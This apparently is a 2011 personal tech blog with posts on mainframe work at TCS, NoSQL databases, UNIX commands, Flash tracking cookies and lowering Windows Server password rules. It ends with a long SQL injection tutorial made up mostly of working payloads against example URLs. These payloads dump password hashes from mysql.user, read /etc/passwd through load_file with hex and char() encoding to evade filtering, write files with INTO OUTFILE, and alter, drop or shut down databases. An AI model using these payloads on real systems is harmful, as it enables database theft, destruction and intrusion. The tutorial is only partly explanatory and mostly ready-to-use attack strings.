Monday, October 10, 2011

How Mainframe is changing Life?

After being trained in Mainframes with one of the premier organization, TCS, I was sent to Chennai with complete batch giving shocking news just 2 days before we were due to join Ahmadabad. We were told that there are certain "Critical Business Requirements" and to compensate these requirements they are sending us to Chennai.


I thought it could change life and I am going to work something really good and make myself worth working in TCS.


Now, I start my daily routine by waking up, doing my daily business, going to office, eat, and come back, eat again and then sleep. Oh you might be thinking that I missed the most important part of whole of my day, "WORK". But the truth is I didn’t forget, it is not anymore part of my schedule.


When I joined a project, I started up doing some excel sheet work. Then came some manual editing work on mainframes and then came the most fascinated and admired "Cycles". I have to run one or more cycle’s everyday of every week of every month. Nothing has changed; I have to just run them. Write the code in the most tedious way, though there is not much of the coding now done.


One was told to leave all his creativity and knowledge aside, start working like dumb, ask no question and follow the checklist perfectly. Now who cares if 80% of the world's code is written in COBOL? However nobody of them told that there are no new technological breakthrough happening in mainframe and COBOL. You are asked to work like other almost 50K odd people are working in the organization like sheep and cow.


I wanted to work in Networking, but I was told "NO" at all the points and passages I went. I was asked to work whatever that is assigned to me.


I am not saying that everyone who is working on mainframe is having the same kind of work, may be its just me or maybe not. If somebody is happy with whatever he is doing he has to keep doing it until he feels it’s worth doing it. I just wanted to let you know that this is what happened to me.

Tuesday, October 4, 2011

Yes to noSQL..!!


With Oracle diving in to the noSQL type of Databases, buzz for these kind of databases have increased. Oracle Corporation has announced that it is going to launch its noSQL Database soon. The website of ORACLE says, it would be available by mid-October for downloads as it is going to be open source.

Now let me talk something about noSQL first. noSQL can be abbreviated as "Not Only SQL". The noSQL is a class of database management systems that have come up in recent years that differ from typical class of RDBMSes. “noSQL” databases does not provides joins or schemas as RDBMSes. noSQL expands horizontally whereas RDBMSes expands vertically.

A broad range of services over Internet are using noSQL databases. Netflix, digg, Linkedin,Facebook etc are some of the big examples that have adopted noSQL as their choice of DB. There was buzz that Wikipedia should also use this kind of DB because it has a vast amount of data and this is the best solution for that range of data.

noSQL is a collection of key-value. This can be implemented using any programming language as Key-Value stores allow the application to store its data in schema-less way. The data can be stored in a data-type or object of any programming language. This also does not require any particular data-model.

Now, lets come to big question. Why to use noSQL databases instead of SQL databases?
The reason being the volume of data that they handle. Normal SQL Databases are good up to 10 million records and then they start become annoying. But if you have some Billion+ key-values to be stored then these kinds of databases are used. so these are best suited for Forums, blogs, social networking website, where there is huge amount of data and data needs to be fetched fast.
The much bigger question is Can noSQL replace SQL?
I believe this cannot happen at any point of time in near future of 5 to 10 years. SQL databases have their own importance in the IT industry. They are reliable, much more stable and are suitable to needs of the customers (most of them). Although both these target different solutions to different problems.

But the noSQL databases can be in conjunction with RDBMS databases. The data like (username, Order, Money) can be stored in RDBMS where as the application data, social network data, video data can be stored in noSQL databases(as these require performace).
Some of the most popular noSQL DBs are as follows:
  • MangoDB
  • BigTable
  • Apache Cassandra
  • Neo4J
  • MarkLogic
  • Exist
  • Hbase
  • db4o
The list may go on, but these are what most widely used...!!
The Feature set of noSQL as mentioned by Oracle are as follows:
·         Simple Data Model
    • Key-value pair data structure, keys are composed of Major & Minor keys
    • Easy-to-use Java API with simple Put, Delete and Get operations
·         Scalability
    • Automatic, hash-function based data partitioning and distribution
    • Intelligent NoSQL Database driver is topology and latency aware, providing optimal data access
·         Predictable behavior
    • ACID transactions, configurable globally and per operation
    • Bounded latency via B-tree caching and efficient query dispatching
·         High Availability
    • No single point of failure
    • Built-in, configurable replication
    • Resilient to single and multi-storage node failure
    • Disaster recovery via data center replication
·         Easy Administration
    • Web console or command line interface
    • System and node management
    • Shows system topology, status, current load, trailing and average latency, events and alerts.

Monday, October 3, 2011

Basics of UNIX


File and Directory Structure:
The Directory Structure of Unix/Linux based operating systems is Inverted Tree, where roots(/) are at the top and rest comes down heretically.  The file system looks like:
  • / — the slash / character alone denotes the root of the virtual filesystem tree.
  • /bin — stands for "binaries" and contains certain fundamental utilities, such as ls or cp, needed by all users.
  • /sbin — stands for "system (or "superuser") binaries" and contains fundamental utilities, such as init, usually needed to start, maintain and recover the system.
  • /etc — contains configuration files and system databases.
  • /dev — stands for "devices". Contains file representations of peripheral devices.
  • /home — contains the home directories for the users.
  • /mnt — contains filesystem mount points.
  • /lib — contains system libraries.
  • /root — the home directory for the super-user root.
  • /tmp — a place for temporary files. Many Unices clear this directory upon start up.
  • /usr — originally the directory holding user home directories, its use has changed, and it now holds executables, libraries, and shared resources that are not system critical, like the X Window System, KDE, Perl, etc. (The name "Unix System Resources" is a post hoc backronym). However, on some UNIX systems, some user accounts may still have a home directory that is a direct subdirectory of /usr, such as the default as in Minix.
  • /var — a short for "variable." A place for files that may change often.
  • /proc — contains all processing data (Process information about a running operating system).
  •  /opt — contains add-on software.
  • /media — default mount point for removable devices.
  • /srv — server data (data for services provided by system).
  • /boot — contains all the important files which are required for successful booting process.
  • /sys — contains information related to hardware.
For more information Please follow: http://en.wikipedia.org/wiki/Unix_directory_structure


Shortcuts of Shell
Following are the mail shortcuts that can be used in the K-shell of AIX for more productiveness:
  • To navigate with the prev and next commands : ESC + j and ESC + k
  • To navigate right to left and vice-versa in a command : ESC + h and ESC + l
  • To inserts chars between a already written command: ESC + h/l (this is to navigate) + i (this is to insert). Remember that the INSERT key doesn’t work here on shell for inserting. 
  • To auto-complete a file or directory name: ESC + \

VI editor
  • VI is an Editor used to edit files in the UNIX based system. Following are the mostly used features of VI: 
    • To open a file in VI editor : $vi <filename>
    • Note: This will open the file if it is present in the current directory or else it will create the file if the directory is not mentioned.
  • To insert in to the file once the file is open for editing : press i or press a or press INSERT Key
  • To quit from the vi editor one need to come to normal mode from the insert mode. Use ESC key to come to normal mode from Insert mode.
    • :q! --> to quit forcefully
    • :w! --> to write the content of the last edit to the file, forcefully
    • :wq! --> to write the content of the last edit to the file as well as quit, forcefully.
  • Use Following commands in Normal mode:
    • :set number --> to see the line numbers
    • :set nonumber -->to remove the line numbering
    • /<word> --> to search the word in the file
Basic Commands:
Following is the list of basic commands that can be used on almost all the UNIX based systems and enhances the productivity:
  • $cd --> To come to users own home directory from any location
  • $cd <directory path> --> To go to the specified directory path
  • $cd .. --> To go one level up in the directory structure.
  • $cd - --> To go the previous directory that one is working before working to the current directory.
    • Note:Please note the SPACE between cd .. and cd –
  • $touch <filename> --> Creates empty files, if the file is not present. If the file is present the access time stamp will be changed.
  • $mkdir <dir-name> --> To create a directory.
  • $mkdir –p <dir1/dir2/dir3> --> To create recursive directories. Using this dir2 is created in dir1 and dir3 is created in dir2.
  • $rm <filename> --> To delete a file. One will be prompted yes or no when this command is used.
  • $rm –rf <filename or dirname> --> To delete files or complete directories. It won’t prompt for yes or no before deleting the file or directory.
  • $man <command> --> To get information about a command. For example $man grep will give all the information regarding the grep command.
  • $cp <source> <destination> --> To copy a file or directory from source to destination.
  • $mv <source> <destination> --> To move a file or directory form source to destination.
  • $clear --> clears the prompt
  • $cat <filename> --> to view the content of the file.
  • $date --> prints the date on the prompt
  • $echo “String” --> prints the String on the prompt.
  • $grep <pattern> <filename> --> to search a pattern of strings within a filename.
    • Note: The various options of grep can be easily understood using the man page ie $man grep.
  • $cat <filename> | more --> To view a file which is more than one page long. RETURN (ENTER) key is used to scroll one line and SPACE key is used to scroll 1 Page.
  • $more <filename> --> works same as the above command.
Shell and Shell Script
A UNIX shell is a command-line interpreter or shell that provides a traditional user interface for the UNIX based operating system and for Unix-like systems. The shell that a user is using can be found using
$echo $SHELL
/bin/ksh
This means that K-shell is used by the user.
The most widely used Shells are as follows:
  • Korn Shell --> ksh
  • Bourne Shell --> bsh
  • Bourne Again Shell --> bash
  • C- Shell --> Csh
For reading and referring to the Shell Scripting please follow the below mentioned links as it is a long topic and cannot be covered in this completely.
Use of $
Following the table how $ can be used in a Shell Script.
$1 - $9
These variables are the positional parameters.
$0
The name of the command currently being executed.
$#
The number of positional arguments given to this invocation of the shell.

$? 
The exit status of the last command executed is given as a decimal string.  When a command completes successfully, it returns the exit status of 0 (zero), otherwise it returns a non-zero exit status.
$$
The process number of this shell - useful for including in filenames, to make them unique.
$!
The process id of the last command ran in the background.
$-
The current options supplied to this invocation of the shell.
$*
A string containing all the arguments to the shell, starting at $1.
$@
Same as above, except when quoted.

Sunday, October 2, 2011

Are you being Tracked??

As stated on Wikipedia.com "A zombie cookie is any HTTP cookie that is recreated after deletion from backups stored outside the web browser's dedicated cookie storage. This makes them very difficult to remove. These cookies may be installed on a web browser that has opted to not receive cookies since they do not completely rely on traditional cookies".

Almost all of the internet uses Adobe Flash Plugin to provide online video capabilities to the web. But this is not all what this is designed for. More than half of the internet’s top websites use a little known capability of Adobe’s Flash plug-in to track users and store information about them.

Flash cookies are used by many of the net’s top websites for a variety of purposes, from setting default volume levels on video players to assigning a unique ID to users that tracks them no matter what browser they use.

Websites can store up to 100K of information in the plug-in, 25 times what a browser cookie can hold. Sites like Pandora.com also use Flash’s storage capability to pre-load portions of songs or videos to ensure smooth playback.

Some Flash-cookie (LSO) properties in short...
- they are never expiring - staying on your computer for an unlimited time.
- by default they offer a storage of 100 KB (compare: Usual cookies 4 KB).
- browsers are not fully aware of LSO's, They often cannot be displayed or managed by browsers.
- via Flash they can access and store highly specific personal and technical information (system, user name, files,...).
- ability to send the stored information to the appropriate server, without user's permission.
- Flash applications do not need to be visible
- there is no easy way to tell which Flash-cookie sites are tracking you.
- shared folders allow cross-browser tracking, LSO's work in every flash-enabled application
- the Flash company doesn't provide a user-friendly way to manage LSO's, In fact it's incredible cumbersome.
- many domains and tracking companies make extensive use of Flash-cookies.

All modern browsers now include fine-grained controls to let users decide what cookies to accept and which to get rid of, but Flash cookies are handled differently. These are fixed through a web page on Adobe’s site, where the controls are not easily understood (There is a panel for Global Privacy Settings and another for Website Privacy Settings — the difference is unclear). In fact, the controls are so odd, the page has to tell you that it is the control, not just a tutorial on how to use the control.

There are ways, if you don't want to be tracked. One cool way is to use Private browsing, which is available in all major Browsers. There are tool available that can help you delete all the cookies, that is just for time being, because Technology is ever developing, who knows something new comes up another day and it will take up all your important browsing history.

Tools :
* Better Privacy extension for Firefox -
https://addons.mozilla.org/en-US/firefox/addon/6623
* Ccleaner - http://www.ccleaner.com/

I could not found any tool for Chrome. While browsing all of the browser setting for Chrome, i only found "Delete all Cookies". This thing worked it cleared all the cookies including the flash-cookies also.

Modify Windows Server Password Policy


So, while playing with Windows Server 2008 R2, I found the minimum password requirements to be a bit too stringent for a lab environment. If you find yourself in a similar predicament and wish to lower the password requirements to near-nothing (not recommended for production environments), then follow these steps:
  1. Open a command prompt
  2. Type 'secedit /export /cfg c:\temp.cfg' and hit enter
  3. Edit c:\temp.cfg in your favorite ASCII editor
    • Change the line "PasswordComplexity = 1" to "PasswordComplexity = 0"
    • Change "MinimumPasswordLength = 7" to a smaller value.
    • Save and close the file
  4. At a command prompt type "secedit /configure /db %windir%\security\local.sdb /cfg c:\temp.cfg /areas SECURITYPOLICY"
The new settings should be in place. Create an account and it won't bug you if the password is too short.

Friday, September 30, 2011

SQL Injection Discussed

What is SQL injection? It is a mean of database exploitation through queries (sql commands) in order to read database tables contents, mainly, attack or gain unauthorized access to a system using the exploited database. A great number of modern websites suffers from this vulnerability, which can cause simple information leakage or total improvisation. So its severity is relative high. 



What causes this vulnerability? Improper sanitization of submitted info procedures.SQL injections based on poorly filtered strings are caused by user input that is not filtered for escape characters. This means that a user can input a variable that can be passed on as an SQL statement, resulting in database input manipulation by the end user. Code that is vulnerable to this type of vulnerability might look something like this: 

$pass = $_GET['pass']; $password = mysql_query("SELECT password FROM users WHERE password = '". $pass . "';"); 

Lets suppose a webpage http://www.victim.com/index.php?id=1 the first stage of attack includes finding the number of coloumns of database table. This can be done in the following way:
http://www.victim.com/index.php?id=1 order by x 
where x=1,2,3 (1+) raising until an error message is gotten. The x-1 number is the exact number of columns. 

Next follows finding the names of tables and coloumns of the table, as well as any other tables and columns using the information_schema. First let us understand about the information schema.

What is Information Schema? It is a major table existing in any PHP version database including information about: table names, column names, users, database, users privilege, privileges, database So to achieve this two methods can be used the union+select or the grouped by method: 

http://www.victim.com/index.php?id=-1+union+select+1,2,3-- (or union all select 1,2,3--) 

At this point id=-1 and – are met. The first one is the null value(can be used also:null). The seconde one –means the end of the query, any text after that is just commenting. Also can be used # or /*. The previous means select names of 1,2,3 from any database, with out null value just taken again the initial url. Also words in url can be connected with simple whitespaces,+ or %20, last is the hex character for space. 

The second method takes advantage of id: 
http://www.victim.com/index.php?Select 1,2,3 grouped by id=1-- 
Each time on the page appears a number columns and any other new information possible to be related with columns_name, then that number should be substituted by the proper info. So in following steps it is possible reading the column_names. The following step includes involving information_schema tables 

http://www.victim.com/index.php?id=-1+union+select+1,2,3+from+information_schema.tables-- 

http://www.victim.com/index.php?id=-1+union+select+1,concat(table_name),3,..,N+FROM+INFORMATION_SCHEMA.TABLES+limit+0,1-- 

In the last query a new command is used, limit. With limit 0,1 the first table is returned. With limit 1,1 the second table is returned, with limit 14,1 the 15 table is returned, with limit 18,1 the 19 table is returned and so on.The procedure is repeated until getting an error. When error is gotten all tables are found.

More info about database version, database and user can be gained by using the proper sql function into the queries. In MySQL version 5 and below it is possible to get MySQL root rights. These versions include a table named mysql.user containing hashes and usernames for logins, like in the following code 

http://www.victim.com/index.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/* 
Hashes are in mysqlsha1 format. To check what privileges a user has the following query can be used 

http://www.site.gr/index.php?id=-1+union+all+select+1,2,group_concat(user,0x3a,file_priv),4,5,6,7+from+mysql.user-- 

the result are in format Username:Privileges When Y appears there are relative privileges, where N appears not.
http://www.victim.com/index.php?id=-1+union+select+1,2,version()--
http://www.victim.com/index.php?id=-1+union+select+1,2,@@version--
http://www.victim.com/index.php?id=-1+union+select+1,2,user()--
http://www.victim.com/index.php?id=-1+union+select+1,2,database()-- 
Although these functions are not columns of database they are implemented in the query as one of the existing columns otherwise a message of improper columns number is returned. The functions are inserted in place of vulnerable field. Modifying database content: After information is found about a database either with SQL injection or Blind SQL injection, described in later lines, it is possible to modify its content. 
Suppose the victim page http://www.victim.com/index.php?id=5 and the query (with column names): select title, article, author from data where id=5 (found by injection) So table name can be change:

http://www.victim.com/index.php?id=5 UPDATE table_name SET title='hacked',article='hacked',author='somebody'-- 

thus changing title,article and author. Or it is possible to delete one or more columns: 

http://www.victim.com/index.php?id=5 DELETE title,article,author from data-- 
or 
http://www.victim.com/index.php?id=5 DELETE title,article,author FROM data where id=5-- for id=5 etc

http://www.victim.com/index.php?id=5 DROP TABLE data-- 
this last query completely deletes one table. In the previous queries it was possible to delete any number of columns. 

Putting MySQL server offline: The command SHUTDOWN WITH NOWAIT is used, for example take the following query: 
http://www.victim.com/index.php?id=5 SHUTDOWN WITH NOWAIT; LOAD_FILE

it permits viewing the contents of a given file. As seen in the following query, function load_file() replaces vulnerable parameter as well as it is given with full working directory. 

http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,load_file('/etc/passwd'),4,5,6,7+from+mysql.user-- 

If this query returns an error that means that a magic quote filetering is used as countermeasure, with the server inserting backslashes before and after quotes. It bypasses magic quote filtering the file (directory) should be written in hexademical format or each character should be replaced with its ASCII value, all values seperated with commas (,) when using char() function. When using hexademical formatting, that is specified in the query by inserting 0x just before the hexademical values, without any empty space before and after the hexademical values. For example the previous query using hex and char is written in the following ways: 
For hexademical formatting: 
http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7+from+mysql.user-- 
For char() method: 
http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7+from+mysql.user-- INTO OUTFILE 

With this command it is possible to write a file into a given directory with a specific text. In the following example the file test. When using this method as above and more than one fields are vulnerable (columns), then the last is replaced with the query, the other replaced with null. When return or enter keys are used in text, it is written and trasposed into char or hex. If magic quote filtering is used, then the text, just the text is converted to hex. 
The directory, file should be written with precision inside ' '. In the following example the query creates a file test.txt in directory home/site/www/ with the text “testing” (http://www.site.gr/test.txt). A possible exploitation of this method is creating a vulnerable file inside a server and later attacking it with RFI.
http://www.examplesite.com/index.php?id=-1+union+all+select+1,2,"testing",4,5,6,7+INTO+OUTFILE+'/home/site/www/test.txt'-- 
Blind SQL injection in this method conclusions are based on difference between valid and invalid query results after our valid or invalid inputs. Because unlike simple sql injection we dont receive any direct info on page this type of injection is called blind.

Suppose the page http://www.victim.com/index.php?id=1We try injecting the following statements 

http://www.victim.com/index.php?id=1 and 1=1http://www.victim.com/index.php?id=1 and 1=2 

The first request always results true returning the initial page. But on the second request, and incase there is not any proper defensive filter, we get a false result, differing from the result of the previous request.